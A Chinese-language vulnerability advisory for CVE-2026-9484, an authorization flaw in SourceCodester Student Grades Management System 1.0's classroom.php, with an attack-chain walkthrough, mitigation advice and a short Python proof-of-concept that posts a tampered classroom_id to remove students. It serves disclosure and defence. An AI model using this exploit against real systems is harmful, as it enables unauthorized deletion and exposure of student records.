CVE-2026-9484 SourceCodester学生成绩管理系统权限不当漏洞

漏洞信息

漏洞编号

CVE-2026-9484

漏洞类型

权限不当

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

SourceCodester Student Grades Management System

漏洞概述

SourceCodester Student Grades Management System 1.0 存在权限不当漏洞。该漏洞源于 `classroom.php` 文件中的 `getClassroomStudents` 和 `removeStudentFromClassroom` 函数未对 `classroom_id` 参数进行严格的权限验证。攻击者无需用户交互，利用低权限账号即可通过网络发送特制请求，操纵该参数绕过安全检查。成功利用此漏洞可能导致数据泄露或被删除，影响系统的机密性、完整性和可用性。

技术细节

该漏洞属于业务逻辑层面的访问控制缺陷。在 `classroom.php` 处理请求时，系统直接信任用户提交的 `classroom_id` 参数，而未在服务器端验证当前会话用户是否拥有对该特定教室ID的操作权限。根据CVSS 3.1分析，攻击向量为网络，攻击复杂度低，无需用户交互。攻击者只需构造包含恶意 `classroom_id` 的HTTP请求发送至服务器，即可调用敏感接口。这使得攻击者能够以低权限身份执行高权限操作，如越权获取学生列表或删除关键数据，破坏系统逻辑安全。

攻击链分析

STEP 1

1. 侦察

攻击者识别出目标系统运行的是 SourceCodester Student Grades Management System 1.0，并确认 `classroom.php` 接口可访问。

STEP 2

2. 漏洞利用

攻击者使用低权限账户登录，向服务器发送构造的 HTTP POST 请求，请求中包含被篡改的 `classroom_id` 参数，意图调用 `removeStudentFromClassroom` 功能。

STEP 3

3. 权限绕过

服务器接收到请求后，未验证当前用户是否具有该 `classroom_id` 的管理权限，直接执行删除或查询操作。

STEP 4

4. 影响达成

攻击者成功删除了不属于其权限范围的学生记录或获取了敏感信息，导致数据完整性或机密性受损。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_url, classroom_id):
    """
    PoC for CVE-2026-9484: Improper Authorization in Student Grades Management System
    """
    # Target endpoint based on the vulnerable file and function
    url = f"{target_url}/classroom.php"
    
    # Payload data manipulating the classroom_id
    payload = {
        "action": "removeStudentFromClassroom",
        "classroom_id": classroom_id  # Attacker controlled parameter
    }
    
    try:
        # Sending the request to trigger the vulnerability
        response = requests.post(url, data=payload)
        
        if response.status_code == 200:
            print("[+] Request sent successfully. Check if the student was removed.")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    # Example usage
    target = "http://127.0.0.1/sgms"
    target_id = "1" # ID to manipulate
    exploit(target, target_id)

影响范围

SourceCodester Student Grades Management System 1.0

防御指南

临时缓解措施

建议管理员暂时通过网络访问控制列表（ACL）限制对 `/classroom.php` 的访问，仅允许受信任的IP地址连接。同时，应在代码层面紧急修补权限验证逻辑，在执行任何删除或查询操作前，强制检查当前会话用户ID与目标教室ID的所有权关系，确保操作经过授权。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-9484
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-9484
3 Details https://www.cvedetails.com/cve/CVE-2026-9484/
4 VulDB https://vuldb.com/cve/CVE-2026-9484
5 Link https://github.com/Jack-MRJ/Student-Grades-Management-System-Vulnerability-Report
6 Link https://vuldb.com/submit/814038
7 Link https://vuldb.com/submit/814039
8 Link https://vuldb.com/submit/814042
9 Link https://vuldb.com/vuln/365465
10 Link https://vuldb.com/vuln/365465/cti
11 Link https://www.sourcecodester.com/